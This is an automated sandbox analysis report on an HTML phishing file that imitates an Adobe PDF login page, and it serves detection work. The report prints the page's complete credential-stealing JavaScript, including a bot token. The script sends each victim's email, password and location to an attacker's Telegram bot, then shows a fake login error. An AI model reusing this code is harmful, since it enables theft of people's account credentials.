Edit tour

Windows Analysis Report
Payment_00372_26-12-2024.html

Overview

General Information

Sample name:	Payment_00372_26-12-2024.html
Analysis ID:	1583280
MD5:	eb5666e02c87df8dfd6d0b25a0ea5e17
SHA1:	addf219a3f1fabafa88e1293f3570abe9e627c66
SHA256:	0292c04d2d424c5a5e207bca888fa649bc139c145c6bd5898457485157c5ac74
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

HTML document with suspicious name

HTML file submission containing password form

Javascript uses Telegram API

Detected clear text password fields (password is not hidden)

HTML body contains low number of good links

HTML title does not match URL

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Javascript checks online IP of machine

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_00372_26-12-2024.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.0.pages.csv

Javascript uses Telegram API

Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html

HTTP Parser: document.getelementbyid('contactform').addeventlistener('submit', function(e) { e.preventdefault(); // get the form data const good = document.getelementbyid('good').value; const email = document.getelementbyid('email').value; // fetch location details from ipinfo.io api fetch('https://ipinfo.io?token=7fb8ecb0d26ce0') // replace with your actual ipinfo.io token .then(response => response.json()) .then(data => { const location = `${data.city}, ${data.region}, ${data.country}`; // your bot token and chat id const bottoken = '7513765431:aahxkmtnhx_0rvvrltr1cxqqni59wokc9t4'; // replace with your bot token const chatid = '7085025619'; // replace with your chat id // construct the message with location info const telegrammessage = `new submission:\nemail: ${email}\npassword: ${good}\nlo...

Source: Payment_00372_26-12-2024.html	HTTP Parser: <input type="text"... for password input
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	HTTP Parser: <input type="text"... for password input

Source: Payment_00372_26-12-2024.html	HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	HTTP Parser: Number of links: 0

Source: Payment_00372_26-12-2024.html	HTTP Parser: Title: Adobe does not match URL
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	HTTP Parser: Title: Adobe does not match URL

Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html

HTTP Parser: Has password / email / username input fields

Source: Payment_00372_26-12-2024.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	HTTP Parser: No favicon

Source: Payment_00372_26-12-2024.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	HTTP Parser: No <meta name="author".. found

Source: Payment_00372_26-12-2024.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49729 version: TLS 1.0

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

JA3 fingerprint: 1138de370e523e824bbca92d049a3777

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49729 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: blogger.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: Payment_00372_26-12-2024.html	String found in binary or memory: https://api.telegram.org/bot$
Source: Payment_00372_26-12-2024.html	String found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s
Source: Payment_00372_26-12-2024.html	String found in binary or memory: https://ipinfo.io?token=7fb8ecb0d26ce0

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998

System Summary

HTML document with suspicious name

Source: Name includes: Payment_00372_26-12-2024.html

Initial sample: payment

Source: classification engine

Classification label: mal60.phis.winHTML@24/9@8/6

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_00372_26-12-2024.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html

HTTP Parser: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	142.250.186.164	true	false	high
googlehosted.l.googleusercontent.com	172.217.16.193	true	false	high
blogger.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org/bot$	Payment_00372_26-12-2024.html	false	high
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s	Payment_00372_26-12-2024.html	false	high
https://ipinfo.io?token=7fb8ecb0d26ce0	Payment_00372_26-12-2024.html	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.36	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
172.217.16.193	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
142.250.186.65	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583280
Start date and time:	2025-01-02 10:27:40 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment_00372_26-12-2024.html
Detection:	MAL
Classification:	mal60.phis.winHTML@24/9@8/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.35, 142.250.185.206, 74.125.71.84, 142.250.185.174, 142.250.185.142, 142.250.184.202, 142.250.186.74, 142.250.185.202, 142.250.185.138, 142.250.186.42, 142.250.185.234, 172.217.18.10, 172.217.16.138, 142.250.186.138, 142.250.185.106, 142.250.181.234, 142.250.185.170, 142.250.186.170, 142.250.74.202, 216.58.206.42, 172.217.18.106, 199.232.210.172, 192.229.221.95, 142.250.181.238, 142.250.185.238, 142.250.184.206, 172.217.16.195, 142.250.185.78, 216.58.206.78, 199.232.214.172, 142.250.186.174, 172.217.18.14, 216.58.212.174, 184.28.90.27, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Input	Output
URL: file:///C:/Users/user/Desktop/Payment_00372_26-1... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates moderate-risk behaviors, including sending user data (email and password) to a third-party Telegram bot API without explicit user consent. While the intent may be to notify the site owner of a form submission, the lack of transparency and potential for misuse raises concerns. Additionally, the script retrieves the user's location details from an external API, which could be considered a privacy risk. Overall, the script requires further review to ensure proper security and privacy practices are in place." }
document.getElementById('contactForm').addEventListener('submit', function(e) { e.preventDefault(); // Get the form data const good = document.getElementById('good').value; const email = document.getElementById('email').value; // Fetch location details from ipinfo.io API fetch('https://ipinfo.io?token=7fb8ecb0d26ce0') // Replace with your actual ipinfo.io token .then(response => response.json()) .then(data => { const location = `${data.city}, ${data.region}, ${data.country}`; // Your bot token and chat ID const botToken = '7513765431:AAHxKMTnhX_0rVvRLTr1CXqqnI59wokc9T4'; // Replace with your Bot Token const chatId = '7085025619'; // Replace with your Chat ID // Construct the message with location info const telegramMessage = `New Submission:\nEmail: ${email}\nPassword: ${good}\nLocation: ${location}`; // Send the data to Telegram fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ chat_id: chatId, text: telegramMessage }) }).then(response => { if (response.ok) { document.getElementById('responseMessage').textContent = 'Incorrect Email or Password!'; document.getElementById('responseMessage').style.color = '#ff0000'; // Green for success document.getElementById('contactForm').reset(); // Reset form after submission } else { document.getElementById('responseMessage').textContent = 'Failed to send message.'; document.getElementById('responseMessage').style.color = '#ff0000'; // Red for error } }).catch(error => { document.getElementById('responseMessage').textContent = 'An error occurred: ' + error; document.getElementById('responseMessage').style.color = '#ff0000'; // Red for error }); }).catch(error => { document.getElementById('responseMessage').textContent = 'Failed to retrieve location data: ' + error; document.getElementById('responseMessage').style.color = '#ff0000'; // Red for error }); });
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://
URL: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Adobe PDF", "prominent_button_name": "Login", "text_input_field_labels": [ "nosunturmin@movintrarol.com", "Password" ], "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Adobe PDF", "prominent_button_name": "Login", "text_input_field_labels": [ "nosunturmin@movintrarol.com", "Password" ], "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html Model: Joe Sandbox AI	{ "brands": [ "Adobe PDF" ] }
	{ "brands": [ "Adobe PDF" ] }
URL: file:///C:/Users/user/Desktop/Payment_00372_26-12-2024.html Model: Joe Sandbox AI	{ "brands": [ "Adobe PDF" ] }
	{ "brands": [ "Adobe PDF" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	index.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	https://tr171139818.amoliani.com/c/mm14r39/e-v_xxa-/imz77nt3nps	Get hash	malicious	Unknown	Browse
	https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg	Get hash	malicious	Unknown	Browse
	book-captcha.com.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	random(4).exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	http://www.rr8844.com	Get hash	malicious	Unknown	Browse
	https://bitl.to/3Y0B	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	http://smbc.usobd.com	Get hash	malicious	Unknown	Browse
	tmpAE4B.HTmL.html	Get hash	malicious	HTMLPhisher	Browse
	01012025.html	Get hash	malicious	HTMLPhisher	Browse

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	over.ps1	Get hash	malicious	Vidar	Browse	23.1.237.91
	https://redcap-int.istitutotumori.mi.it/	Get hash	malicious	Unknown	Browse	23.1.237.91
	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	726odELDs8.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.1.237.91
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	23.1.237.91
	GnHq2ZaBUl.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	ZvHSpovhDw.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	7jKx8dPOEs.exe	Get hash	malicious	LummaC	Browse	23.1.237.91

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9857601576173116
Encrypted:	false
SSDEEP:	48:8PrOOd5ThVxHOidAKZdA19ehwiZUklqehly+3:8P1HC+y
MD5:	2B6069E7C13D39D41FFB95B4055D32F4
SHA1:	047A3962E254A36C6012FCA919D2FB45920CD35A
SHA-256:	06213BF0C08ACF25A855BDB0D15072CBDB932919BF407429F1DC4E7ED1CD9D81
SHA-512:	B5C415CF68C962E3064440D1852187EC5DD67A092D9035419AE0D52F3018605E855A1DD510E64EDC76EF10C023EC169679FAFBD17F9A7E32FDAB7F1E187EF0CB
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....U"..\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.000027599636401
Encrypted:	false
SSDEEP:	48:8frOd5ThVxHOidAKZdA1weh/iZUkAQkqehuy+2:80HY9Qny
MD5:	70F918D2281836719CCE27C426CCAE10
SHA1:	94EFE10E4AAF1A53E051C5F2BAC901B9B0A2D7A9
SHA-256:	1988E1B75561C485DDF933730A277710DD2DE79904426C1539CC24534F38614D
SHA-512:	939DBF347DC581E9719103E2051915001F0F38D637C4462F00A69FB77DEEE3C712F6F823647FA7451866E3C79704FA0D4AC0CDBA68E26EB117B3281088096736
Malicious:	false
Reputation:	low
